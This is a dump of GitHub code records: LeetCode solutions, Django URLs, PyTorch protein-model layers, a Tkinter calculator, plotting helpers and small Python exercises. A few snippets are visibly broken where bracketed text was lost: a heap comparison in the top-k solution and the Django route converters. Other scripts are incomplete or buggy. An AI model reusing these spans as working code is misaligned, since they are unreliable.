properties)\n\n","repo_name":"avenacheng/ModDash","sub_path":"data-processing/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
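The UDF in the record above wraps NLTK's VADER analyzer; its compound score is what gets stored per comment. A standalone check of that scoring (requires the vader_lexicon corpus; the sample sentences are made up):

```python
from nltk.sentiment.vader import SentimentIntensityAnalyzer

# import nltk; nltk.download("vader_lexicon")  # one-time setup
sid = SentimentIntensityAnalyzer()
for text in ["I love this subreddit", "This is the worst take ever"]:
    print(text, "->", sid.polarity_scores(text)["compound"])
# compound ranges from -1 (most negative) to +1 (most positive)
```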
+{"seq_id":"18405660969","text":"from itertools import accumulate; from math import floor,ceil,sqrt; import operator; import random; import string; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from functools import reduce,cache; from heapq import *; import unittest; from typing import List,Optional; from functools import cache; from operator import lt, gt\nfrom binary_tree_tester import ser,des; from a_linked_list import make_linked_list\ndef get_sol(): return Solution()\n\nclass Solution:\n # bucket. Time: O(n)\n # https://www.youtube.com/watch?v=EYFcQRwcqk0&t=133s\n def topKFrequent(self, A: List[int], k: int) -> List[int]:\n n=len(A)\n di=Counter(A)\n bucket=[[] for _ in range(n+1)]\n for x in di:\n bucket[di[x]].append(x)\n res=[]\n for i in range(n,-1,-1):\n while k and bucket[i]:\n res.append(bucket[i].pop())\n k-=1\n return res\nclass Solution2:\n # heap\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n pq = []\n di = defaultdict(int)\n for num in nums:\n di[num]+=1\n\n for num in di:\n if len(pq)lowest_freq:\n heappop(pq)\n heappush(pq,(di[num],num))\n res = [x[1] for x in pq]\n return res\n\n# quick select\nclass Solution3:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n count = Counter(nums)\n unique = list(count.keys())\n\n def partition(left, right, pivot_index) -> int:\n pivot_frequency = count[unique[pivot_index]]\n # 1. move pivot to end\n unique[pivot_index], unique[right] = unique[right], unique[pivot_index]\n\n # 2. move all less frequent elements to the left\n i = left - 1\n for j in range(left, right):\n if count[unique[j]] < pivot_frequency:\n i += 1\n unique[i], unique[j] = unique[j], unique[i]\n\n # 3. move pivot to its final place\n unique[right], unique[i+1] = unique[i+1], unique[right]\n\n return i + 1\n\n def quickselect(left, right, k_smallest) -> None:\n \"\"\"\n Sort a list within left..right till kth less frequent element\n takes its place.\n \"\"\"\n # base case: the list contains only one element\n if left == right:\n return\n\n # select a random pivot_index\n pivot_index = random.randint(left, right)\n\n # find the pivot position in a sorted list\n pivot_index = partition(left, right, pivot_index)\n\n # if the pivot is in its final sorted position\n if k_smallest == pivot_index:\n return\n # go left\n elif k_smallest < pivot_index:\n quickselect(left, pivot_index - 1, k_smallest)\n # go right\n else:\n quickselect(pivot_index + 1, right, k_smallest)\n\n n = len(unique)\n # kth top frequent element is (n - k)th less frequent.\n # Do a partial sort: from less frequent to the most frequent, till\n # (n - k)th less frequent element takes its place (n - k) in a sorted array.\n # All element on the left are less frequent.\n # All the elements on the right are more frequent.\n quickselect(0, n - 1, n - k)\n # Return top k frequent elements\n return unique[n - k:]\n\n\nclass mycase(unittest.TestCase):\n def test01(self):\n self.assertEqual([1,2],get_sol().topKFrequent([1,1,1,2,2,3], 2))\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc347.py","file_name":"lc347.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"36707665073","text":"from . import views\nfrom django.conf.urls.static import static\nfrom django.urls import path, include\nfrom moonbling import settings\n\nurlpatterns = [\n path('', views.product_list, name='main'),\n path('shop/', views.product_list, name='product_list'),\n path('shop//', views.product_list, name='product_list_by_category'),\n path('shop//', views.product_detail, name='product_detail'),\n path('shop/about', views.about, name='about'),\n path('shop/contacts', views.contacts, name='contacts'),\n path('product_update/', views.product_update, name='product_update'),\n path('admin_logout/', views.admin_logout, name='admin_logout')\n ]\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"Melikhov-p/moonbling","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"45677948805","text":"import torch\r\nfrom einops import rearrange\r\nfrom torch import nn\r\n\r\nfrom protein_learning.networks.common.helpers.torch_utils import fused_gelu as NONLIN\r\nfrom protein_learning.networks.common.utils import default\r\nfrom protein_learning.networks.common.invariant.units import FeedForward\r\n\r\n\r\nclass FiberWeightedOut(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n fiber,\r\n nonlin=NONLIN,\r\n eps=1e-6, # TODO: changed from 1e-12\r\n include_order_stats=False,\r\n ):\r\n super().__init__()\r\n self.fiber = fiber\r\n self.nonlin = nonlin\r\n self.eps = eps\r\n self.transform = nn.ModuleDict()\r\n self.include_order_stats = include_order_stats\r\n dim0, dim1 = fiber.dims[0] + fiber.dims[1], fiber.dims[1]\r\n if include_order_stats:\r\n dim0 += 2 * fiber.dims[1]\r\n mid = (dim0 + dim1) // 2\r\n self.weight_net = nn.Sequential(\r\n nn.Linear(dim0, mid),\r\n nonlin(),\r\n nn.LayerNorm(mid),\r\n nn.Linear(mid, mid),\r\n nonlin(),\r\n nn.LayerNorm(mid),\r\n nn.Linear(mid, dim1),\r\n )\r\n\r\n def forward(self, features):\r\n output = {}\r\n norm = torch.norm(features['1'], dim=-1)\r\n std, mean = torch.std_mean(norm, dim=1)\r\n rel_norm = (norm - mean) / (std + self.eps)\r\n if self.include_order_stats:\r\n m, s = mean.unsqueeze(1), std.unsqueeze(1)\r\n m, s = m.expand_as(rel_norm), s.expand_as(rel_norm)\r\n inp = torch.cat((features['0'].squeeze(-1), rel_norm, m, s), dim=-1)\r\n else:\r\n inp = torch.cat((features['0'].squeeze(-1), rel_norm), dim=-1)\r\n weights = self.weight_net(inp).unsqueeze(-1)\r\n output['0'] = features['0']\r\n output['1'] = torch.sum(features['1'] * weights, dim=-2, keepdim=True)\r\n return output\r\n\r\n\r\nclass WeightedOut(nn.Module):\r\n def __init__(\r\n self,\r\n coord_dim,\r\n feat_dim,\r\n coord_dim_out=1,\r\n nonlin=NONLIN,\r\n eps=1e-5,\r\n include_norms=True,\r\n n_hidden=1,\r\n ):\r\n super().__init__()\r\n self.nonlin = nonlin\r\n self.eps = eps\r\n self.transform = nn.ModuleDict()\r\n self.coord_dim_out = coord_dim_out\r\n self.coord_dim = coord_dim\r\n dim_in = coord_dim + feat_dim if include_norms else feat_dim\r\n mid, dim_out = max(128, dim_in), coord_dim * coord_dim_out\r\n self.weight_net = FeedForward(dim_in, mid, dim_out, n_hidden=n_hidden)\r\n\r\n def forward(self, coords, feats, return_feats=True):\r\n norm = torch.norm(coords, dim=-1)\r\n std, mean = torch.std_mean(norm, dim=1)\r\n rel_norm = (norm - mean) / (std + self.eps)\r\n inp = torch.cat((feats.squeeze(-1), rel_norm), dim=-1)\r\n weights = self.weight_net(inp)\r\n weight_shape = (*weights.shape[:-1], self.coord_dim, self.coord_dim_out, 1)\r\n weights = weights.view(weight_shape)\r\n coords = coords.unsqueeze(-2)\r\n transformed_coords = torch.sum(coords * weights, dim=-3)\r\n\r\n if return_feats:\r\n return transformed_coords, feats\r\n else:\r\n return transformed_coords\r\n\r\n\r\nclass RadialFunc(nn.Module):\r\n \"\"\"NN parameterized radial profile function.\"\"\"\r\n\r\n def __init__(self, num_freq, in_dim, out_dim, edge_dim=None, mid_dim=None, nonlin=NONLIN,\r\n hidden_layer: bool = True, compress=False, dropout=0.0):\r\n super().__init__()\r\n self.num_freq = num_freq\r\n self.in_dim = in_dim\r\n self.edge_dim = default(edge_dim, 0)\r\n mid_dim = default(mid_dim, edge_dim)\r\n self.out_dim = out_dim\r\n bias = dropout > 0\r\n\r\n layer = lambda i, o, norm=True: nn.ModuleList([\r\n nn.Linear(i, o),\r\n nn.LayerNorm(o) if norm else nn.Identity,\r\n nonlin(),\r\n nn.Dropout(dropout) if dropout > 0 else nn.Identity()\r\n ])\r\n if not 
compress:\r\n self.net = nn.Sequential(\r\n *layer(edge_dim, mid_dim),\r\n *layer(mid_dim, mid_dim) if hidden_layer else nn.Identity(),\r\n nn.Linear(mid_dim, num_freq * in_dim * out_dim, bias=bias)\r\n )\r\n else:\r\n mid_dim, code_dim = edge_dim // 2, edge_dim // 4\r\n self.net = nn.Sequential(\r\n *layer(edge_dim, mid_dim, norm=True),\r\n *layer(mid_dim, code_dim, norm=True),\r\n *layer(code_dim, mid_dim, norm=True),\r\n nn.Linear(mid_dim, num_freq * in_dim * out_dim, bias=bias)\r\n )\r\n\r\n def forward(self, x):\r\n y = self.net(x)\r\n return rearrange(y, '... (o i f) -> ... o () i () f', i=self.in_dim, o=self.out_dim)\r\n\r\n\r\nclass RadialKernel(nn.Module):\r\n \"\"\"NN parameterized radial profile function.\"\"\"\r\n\r\n def __init__(self, num_freq, in_dim, out_dim, edge_dim=None, mid_dim=128):\r\n super().__init__()\r\n self.num_freq = num_freq\r\n self.in_dim = in_dim\r\n self.out_dim = out_dim\r\n self.bin_embedding = nn.Embedding(34, num_freq * in_dim * out_dim)\r\n self._dist_bins = torch.arange(34)\r\n\r\n def dist_bins(self, device):\r\n if self._dist_bins.device != device:\r\n self._dist_bins = self._dist_bins.to(device)\r\n return self._dist_bins\r\n\r\n def forward(self, dists):\r\n print('in radial kernel')\r\n kernels = self.bin_embedding(self.dist_bins(dists.device))\r\n actual_bins = torch.round(torch.clamp((dists - 2.4) / 0.4, 0, 33)).long()\r\n kernels = kernels[actual_bins].squeeze(-2)\r\n return rearrange(kernels, '... (o i f) -> ... o () i () f', i=self.in_dim, o=self.out_dim)\r\n","repo_name":"MattMcPartlon/AttnPacker","sub_path":"protein_learning/networks/common/equivariant/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":5766,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"21"}
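The einops pattern at the end of RadialFunc above turns a flat per-edge feature vector into a broadcastable kernel block. A small shape check (the dimension sizes are illustrative):

```python
import torch
from einops import rearrange

num_freq, in_dim, out_dim = 4, 8, 16
y = torch.randn(2, 10, out_dim * in_dim * num_freq)   # (batch, edges, o*i*f)
w = rearrange(y, '... (o i f) -> ... o () i () f', i=in_dim, o=out_dim)
print(w.shape)  # torch.Size([2, 10, 16, 1, 8, 1, 4])
```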
+{"seq_id":"20139465408","text":"from typing import List\n\n\"\"\"\nhttps://leetcode.com/problems/maximum-level-sum-of-a-binary-tree/\n\nReturn the smallest level X such that the \nsum of all the values of nodes at level X is maximal.\n\"\"\"\n\n\nclass Solution:\n def maxLevelSum(self, root: TreeNode) -> int:\n def dfSearch(root: TreeNode, level: int, sums: List[int]=[]):\n if not root:\n return sums\n else:\n if level >= len(sums):\n sums.append(0)\n sums[level] += root.val\n dfSearch(root.left, level + 1, sums)\n dfSearch(root.right, level + 1, sums)\n return sums\n\n sums = dfSearch(root, 0)\n return sums.index(max(sums)) + 1","repo_name":"V-Wong/LeetCode","sub_path":"Tree/max_level_sum.py","file_name":"max_level_sum.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"24220268211","text":"from tkinter import *\r\n\r\ndef evaluate(expression):\r\n operators = [\r\n \"+\",\r\n \"-\",\r\n \"x\",\r\n \"/\",\r\n \"^\"\r\n ]\r\n if expression.find(\"(\") != -1:\r\n if expression.count(\"(\") != expression.count(\")\"):\r\n return \"Error: syntax\"\r\n else:\r\n for x in range(expression.count(\"(\") + 1):\r\n openPar = expression.rfind(\"(\")\r\n closedPar = expression.find(\")\")\r\n \r\n\r\n\r\nbutton_values = [\r\n {\"row\": 1, \"col\": 0, \"value\": \"(\"},\r\n {\"row\": 1, \"col\": 1, \"value\": \")\"},\r\n {\"row\": 1, \"col\": 2, \"value\": \"AC\"},\r\n {\"row\": 1, \"col\": 3, \"value\": \"**\"},\r\n \r\n {\"row\": 2, \"col\": 0, \"value\": \"7\"},\r\n {\"row\": 2, \"col\": 1, \"value\": \"8\"},\r\n {\"row\": 2, \"col\": 2, \"value\": \"9\"},\r\n {\"row\": 2, \"col\": 3, \"value\": \"/\"},\r\n\r\n {\"row\": 3, \"col\": 0, \"value\": \"4\"},\r\n {\"row\": 3, \"col\": 1, \"value\": \"5\"},\r\n {\"row\": 3, \"col\": 2, \"value\": \"6\"},\r\n {\"row\": 3, \"col\": 3, \"value\": \"*\"},\r\n\r\n {\"row\": 4, \"col\": 0, \"value\": \"1\"},\r\n {\"row\": 4, \"col\": 1, \"value\": \"2\"},\r\n {\"row\": 4, \"col\": 2, \"value\": \"3\"},\r\n {\"row\": 4, \"col\": 3, \"value\": \"-\"},\r\n\r\n {\"row\": 5, \"col\": 0, \"value\": \"0\"},\r\n {\"row\": 5, \"col\": 1, \"value\": \".\"},\r\n {\"row\": 5, \"col\": 2, \"value\": \"=\"},\r\n {\"row\": 5, \"col\": 3, \"value\": \"+\"},\r\n]\r\n\r\nUSING_RPI = False\r\n\r\nclass MainGui(Frame):\r\n def __init__(self, master):\r\n Frame.__init__(self, master)\r\n if USING_RPI:\r\n master.attributes(\"-fullscreen\", True)\r\n self.setupGui()\r\n\r\n def makeButton(self, row, col, value):\r\n bg_color = \"#cccccc\"\r\n if value == \"=\":\r\n bg_color = \"blue\"\r\n\r\n button = Button(\r\n self,\r\n font=(\"Helvetica\", 20),\r\n text=value,\r\n bg=bg_color,\r\n highlightbackground=bg_color,\r\n borderwidth=0,\r\n highlightthickness=0,\r\n width=5,\r\n activebackground=\"white\",\r\n command= lambda : self.handle_button_press(value)\r\n )\r\n button.grid(row=row, column=col, sticky=NSEW)\r\n\r\n def setupGui(self):\r\n self.display = Label(self, text=\"\", anchor=E, bg=\"white\", fg=\"black\", height=1, font=(\"Helvetica\", 30))\r\n self.display.grid(row=0, column=0, columnspan=4, sticky=NSEW)\r\n\r\n for row in range(6):\r\n Grid.rowconfigure(self, row, weight=1)\r\n for col in range(4):\r\n Grid.columnconfigure(self, col, weight=1)\r\n for button in button_values:\r\n self.makeButton(button[\"row\"], button[\"col\"], button[\"value\"])\r\n \r\n self.pack(fill=BOTH, expand=1)\r\n self.errored = False\r\n self.calculated = False\r\n\r\n def handle_button_press(self, buttonVal):\r\n display = self.display[\"text\"]\r\n clear = buttonVal == \"AC\"\r\n evaluate = buttonVal == \"=\"\r\n numeric = buttonVal in list(\"0123456789\")\r\n\r\n if clear:\r\n self.display[\"text\"] = \"\"\r\n return\r\n if evaluate:\r\n try:\r\n result = str(eval(display))\r\n self.display[\"text\"] = result\r\n self.calculated = True\r\n except:\r\n self.display[\"text\"] = \"ERROR\"\r\n self.errored = True\r\n return\r\n if self.errored and numeric:\r\n self.display[\"text\"] = \"\"\r\n self.errored = False\r\n self.display[\"text\"] += buttonVal\r\n return\r\n if self.calculated and numeric:\r\n self.display[\"text\"] = \"\"\r\n self.calculated = False\r\n self.display[\"text\"] = buttonVal\r\n self.display[\"text\"] += buttonVal\r\n self.calculated = False\r\n return\r\n\r\nwindow = Tk()\r\nwindow.title(\"Calculator\")\r\nr = 
MainGui(window)\r\nwindow.mainloop()\r\n\r\n\r\n\r\n \r\n","repo_name":"DanIsHere64/FunWithGit","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71198557173","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n###\n# Created Date: Thursday, August 22nd 2019, 9:25:01 am\n# Author: Charlene Leong leongchar@myvuw.ac.nz\n# Last Modified: Fri Sep 13 2019\n###\n\nimport numpy as np\nimport torch\n\nimport sklearn.metrics\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patheffects as PathEffects\nfrom mpl_toolkits.mplot3d import Axes3D\nimport seaborn as sns\nsns.set(font_scale=2)\n\nSEED = 489\n\ndef plt_scatter(feat=[], labels=[], colors=[], output_dir='.', plt_name='', pltshow=False):\n print('Plotting {}\\n'.format(plt_name))\n labels_list = np.unique(labels[labels!=-1]) # -1 is noise \n palette = sns.color_palette('hls', labels_list.max()+1)\n feat_colors = [palette[x] if x >= 0 else (0.0, 0.0, 0.0) for x in labels]\n ax = plt.subplot()\n ax.tick_params(axis='both', labelsize=10)\n \n if len(colors) == 0:\n plt.scatter(*feat.T, c=feat_colors, s=8, linewidths=1)\n else:\n plt.scatter(*feat[0].T, c=feat_colors, s=8, linewidths=1)\n for i, f in enumerate(feat[1:]):\n plt.scatter(*f.T, c=colors[i], s=8, linewidths=1)\n feat = feat[0]\n\n for label in labels_list: \n xtext, ytext = np.median(feat[labels == label, :], axis=0)\n txt = ax.text(xtext, ytext, str(label), fontsize=18)\n txt.set_path_effects([PathEffects.Stroke(linewidth=5, foreground='w'), PathEffects.Normal()])\n \n plt.savefig(output_dir+'/'+plt_name, bbox_inches='tight')\n if pltshow:\n plt.show()\n plt.close()\n return plt.imread(output_dir+'/'+plt_name)\n\ndef plt_scatter_3D(feat=[], labels=[], colors=[], output_dir='.', plt_name='', pltshow=False):\n print('Plotting {}\\n'.format(plt_name))\n labels_list = np.unique(labels[labels!=-1]) # -1 is noise \n palette = sns.color_palette('hls', labels_list.max()+1)\n feat_colors = [palette[x] if x >= 0 else (0.0, 0.0, 0.0) for x in labels]\n\n fig = plt.figure()\n ax = Axes3D(fig)\n \n if len(colors) == 0:\n ax.scatter(*feat.T, c=feat_colors, s=8, linewidths=1)\n else:\n ax.scatter(*feat[0].T, c=feat_colors, s=8, linewidths=1)\n for i, f in enumerate(feat[1:]):\n ax.scatter(*f.T, c=colors[i], s=8, linewidths=1)\n feat = feat[0]\n\n for label in labels_list: \n xtext, ytext, ztext = np.median(feat[labels == label, :], axis=0)\n txt = ax.text(xtext, ytext, ztext, str(label), fontsize=18)\n txt.set_path_effects([PathEffects.Stroke(linewidth=5, foreground='w'), PathEffects.Normal()])\n\n plt.savefig(output_dir+'/'+plt_name, bbox_inches='tight')\n if pltshow:\n plt.show()\n plt.close()\n return plt.imread(output_dir+'/'+plt_name) \n \ndef plt_confusion_matrix(y_pred, y_target, output_dir, pltshow=False):\n confusion_matrix = sklearn.metrics.confusion_matrix(y_target, y_pred)\n\n plt.figure(figsize=(16, 14))\n sns.heatmap(confusion_matrix, annot=True, fmt='d', annot_kws={'size': 20})\n # plt.title('Confusion matrix', fontsize=10)\n plt.ylabel('True label', fontsize=20)\n plt.xlabel('Clustering label', fontsize=20)\n plt.savefig(output_dir+'/confusion_matrix.png', bbox_inches='tight')\n\n if pltshow:\n plt.show()\n\n return plt.imread(output_dir+'/confusion_matrix.png'), 'confusion_matrix.png'\n\n\ndef plt_clusters(output_dir, data, algorithm, args, kwds):\n fig = plt.figure()\n # start_time = time.time()\n labels = algorithm(*args, **kwds).fit_predict(data)\n # end_time = time.time()\n ax = plt.subplot()\n # ax.axis('tight')\n ax.tick_params(axis='both', labelsize=10)\n # labels_list = np.unique(labels)\n # palette = np.array(sns.color_palette('hls', len(labels_list)))\n palette = sns.color_palette('hls')\n colors 
= [palette[x] if x >= 0 else (0.0, 0.0, 0.0) for x in labels]\n plt.scatter(data.T[0], data.T[1], c=colors, s=8, linewidths=1)\n # frame = plt.gca()\n # frame.axes.get_xaxis().set_visible(False)\n # frame.axes.get_yaxis().set_visible(False)\n plt.title('Clusters found by {}'.format(str(algorithm.__name__)), fontsize=14)\n #plt.text(-0.5, 0.7, 'Clustering took {:.2f} s'.format(end_time - start_time), fontsize=14)\n plt.savefig(output_dir)\n print ( '\\n saved image ', output_dir)\n plt.close(fig)\n return plt.imread(output_dir)\n\n\n ","repo_name":"charleneleong-ai/kun","sub_path":"models/utils/plt.py","file_name":"plt.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
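A hedged usage sketch for plt_scatter defined in the record above: random 2-D features stand in for an embedding, and label -1 is rendered black as noise.

```python
import numpy as np

feat = np.random.randn(300, 2)             # toy 2-D embedding
labels = np.random.randint(-1, 5, 300)     # cluster ids; -1 means noise
img = plt_scatter(feat=feat, labels=labels, output_dir='.', plt_name='demo.png')
```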
+{"seq_id":"10036489838","text":"import cv2\r\nimport numpy as np\r\nimg=cv2.imread('bw.png')\r\nheight=img.shape[0]\r\nwidth=img.shape[1]\r\nchannels=img.shape[2]\r\nimg2=np.zeros((height,width,channels),np.uint8)\r\n\r\n\r\nimg2=cv2.rectangle(img2,(130,0),(230,100),(255,255,255),-1)\r\n\r\nbitAnd=cv2.bitwise_xor(img,img2)\r\n\r\n\r\nprint(height)\r\nprint(width)\r\n\r\n\r\ncv2.imshow('image',img)\r\ncv2.imshow('image2', img2)\r\ncv2.imshow('image3',bitAnd)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"Ricky-arch/OpenCV","sub_path":"bit_wise_operations_image.py","file_name":"bit_wise_operations_image.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"6303267489","text":"\"\"\"定义Learning_logs的url模式\"\"\"\n\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n # Main page\n url(r'^$', views.index, name='index'),\n\n # Show all topics\n url(r'^topics/$', views.topics, name='topics'),\n\n # Special topic to show\n url(r'^topics/(?P\\d+)/$', views.topic, name='topic'),\n]","repo_name":"Snowstark/Learning_log","sub_path":"Learning_logs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71027169332","text":"#!/usr/bin/python3\n\n\n\"\"\"\nbase.py - This module contains the Base class\n\"\"\"\n\nimport json\nimport csv\nimport turtle\n\n\nclass Base:\n \"\"\"\n Base - The base class to manage the 'id' attribute\n \"\"\"\n\n __nb_objects = 0\n\n def __init__(self, id=None):\n \"\"\"\n Constructor for the Base class.\n\n Args:\n id (int, optional): The id to assign to the 'id' attribute\n \"\"\"\n if id is not None:\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\"\n Convert a list of dictionaries to a JSON string representation.\n\n Args:\n list_dictionaries (list): A list of dictionaries.\n\n Returns:\n str: A JSON string representation of the list of dictionaries.\n \"\"\"\n if list_dictionaries is None or len(list_dictionaries) == 0:\n return \"[]\"\n return json.dumps(list_dictionaries)\n\n @classmethod\n def save_to_file(cls, list_objs):\n \"\"\"\n Save a list of instances to a JSON file.\n\n Args:\n list_objs (list): A list of instances that inherit from Base.\n\n Note:\n The filename will be .json - example: Rectangle.json.\n If list_objs is None, an empty list will be saved\n The file will be overwritten if it already exists.\n \"\"\"\n filename = cls.__name__ + \".json\"\n if list_objs is None:\n list_objs = []\n list_dicts = [obj.to_dictionary() for obj in list_objs]\n json_string = cls.to_json_string(list_dicts)\n with open(filename, 'w') as file:\n file.write(json_string)\n\n @staticmethod\n def from_json_string(json_string):\n \"\"\"\n Convert a JSON string representation to a list of dictionaries\n\n Args:\n json_string (str): A string representing a list of dictionaries.\n\n Returns:\n list: A list represented by json_string.\n \"\"\"\n if json_string is None or len(json_string) == 0:\n return []\n return json.loads(json_string)\n\n @classmethod\n def create(cls, **dictionary):\n \"\"\"\n Create an instance with all attributes already set.\n\n Args:\n **dictionary: A dictionary containing attribute names and values.\n\n Returns:\n object: An instance with all attributes set.\n \"\"\"\n if cls.__name__ == \"Rectangle\":\n dummy = cls(1, 1)\n elif cls.__name__ == \"Square\":\n dummy = cls(1)\n else:\n dummy = None\n\n dummy.update(**dictionary)\n return dummy\n\n @classmethod\n def load_from_file(cls):\n \"\"\"\n Load instances from a JSON file.\n\n Returns:\n list: A list of instances.\n \"\"\"\n filename = cls.__name__ + \".json\"\n try:\n with open(filename, 'r') as file:\n json_string = file.read()\n list_dicts = cls.from_json_string(json_string)\n return [cls.create(**dictionary) for dictionary in list_dicts]\n except FileNotFoundError:\n return []\n\n @classmethod\n def save_to_file_csv(cls, list_objs):\n if list_objs is None:\n list_objs = []\n filename = cls.__name__ + \".csv\"\n with open(filename, 'w', newline='') as file:\n writer = csv.writer(file)\n for obj in list_objs:\n if cls.__name__ == \"Rectangle\":\n writer.writerow([obj.id, obj.width, obj.height, obj.x, obj.y])\n elif cls.__name__ == \"Square\":\n writer.writerow([obj.id, obj.size, obj.x, obj.y])\n\n @classmethod\n def load_from_file_csv(cls):\n filename = cls.__name__ + \".csv\"\n try:\n with open(filename, 'r', newline='') as file:\n reader = csv.reader(file)\n obj_list = []\n for row in reader:\n row = [int(val) for val in row]\n if cls.__name__ == \"Rectangle\":\n obj = cls(1, 1)\n obj.id, obj.width, obj.height, obj.x, obj.y = row\n elif cls.__name__ == \"Square\":\n obj = 
cls(1)\n obj.id, obj.size, obj.x, obj.y = row\n obj_list.append(obj)\n return obj_list\n except FileNotFoundError:\n return []\n\n @staticmethod\n def draw(list_rectangles, list_squares):\n screen = turtle.Screen()\n screen.bgcolor(\"white\")\n\n for rect in list_rectangles:\n t = turtle.Turtle()\n t.speed(1)\n t.penup()\n t.goto(rect.x, rect.y)\n t.pendown()\n for _ in range(2):\n t.forward(rect.width)\n t.left(90)\n t.forward(rect.height)\n t.left(90)\n\n for sq in list_squares:\n t = turtle.Turtle()\n t.speed(1)\n t.penup()\n t.goto(sq.x, sq.y)\n t.pendown()\n for _ in range(4):\n t.forward(sq.size)\n t.left(90)\n\n turtle.done()\n","repo_name":"billwk254/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
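A quick round trip through the JSON helpers defined in the record above (the dictionary contents and the import path are assumptions):

```python
from models.base import Base  # import path assumed

dicts = [{"id": 1, "width": 10, "height": 7, "x": 2, "y": 8}]
s = Base.to_json_string(dicts)       # '[{"id": 1, "width": 10, ...}]'
back = Base.from_json_string(s)
print(type(s).__name__, type(back).__name__, back == dicts)  # str list True
```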
+{"seq_id":"8766503353","text":"def reverseString1(str):\n return str[::-1]\n\n# use stack to solve problem\ndef reverseString2(str):\n stack = []\n for ch in str:\n stack.append(ch)\n\n result = \"\"\n while len(stack) > 0:\n result += stack.pop()\n\n return result","repo_name":"leeyulkyu/giveMeAChance","sub_path":"reverseString.py","file_name":"reverseString.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"36945657535","text":"import random\n\nclass Room():\n def __init__(self, room_id):\n self.room_id = room_id\n self.host_id = None\n self.users = []\n self.options = {\n 'ripple_time' : 3,\n 'cooldown' : 0,\n 'send_image' : True,\n 'show_id' : False,\n 'dark_mode' : False\n }\n \n @staticmethod\n def generate_hash(length):\n h = ''\n for _ in range(length):\n d = chr(random.randint(48,57))\n u = chr(random.randint(65,90))\n l = chr(random.randint(97,122))\n h += random.choice([d,u,l])\n return h\n\nif __name__ == '__main__':\n print(Room.generate_hash(5))\n","repo_name":"Tajam/ripple-diary","sub_path":"room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"29099589184","text":"import random\r\n\r\nsalaires = 12\r\nyear = 0\r\nlistesalaires = []\r\nshuffle = 0\r\n\r\nfor i in range(salaires):\r\n wallet = random.randint(0, 10000)\r\n print(wallet)\r\n if wallet < 5000:\r\n print(\"Vous avez moins de 5000 euros ce mois-ci\")\r\n elif wallet >= 5000:\r\n print(\"Vous avez 5000 euros ou plus!\")\r\n year += wallet\r\n listesalaires.append(year)\r\n\r\nprint(\"Cette année, vous avez eu \", year, \" euros !\")\r\nbinary = bin(year)\r\nprint(\"En binaire\", year,\" s'écrit \", binary, \" !\")\r\n\r\ndef rappel() :\r\n shuffle = random.randint(1, 2)\r\n if shuffle ==1:\r\n print(\"Voici la liste des salaires de cette année : \", listesalaires)\r\n elif shuffle ==2:\r\n random.shuffle(listesalaires)\r\n print(\"Voici la liste des salaires de cette année dans le désordre : \", listesalaires)\r\n\r\ndef longueur (a):\r\n print(\"Le mot contient\", len(a), \" caractères\")\r\n\r\nlongueur(\"Informatique\")\r\nrappel()\r\n","repo_name":"matteolg/nsiworks","sub_path":"matt.py","file_name":"matt.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
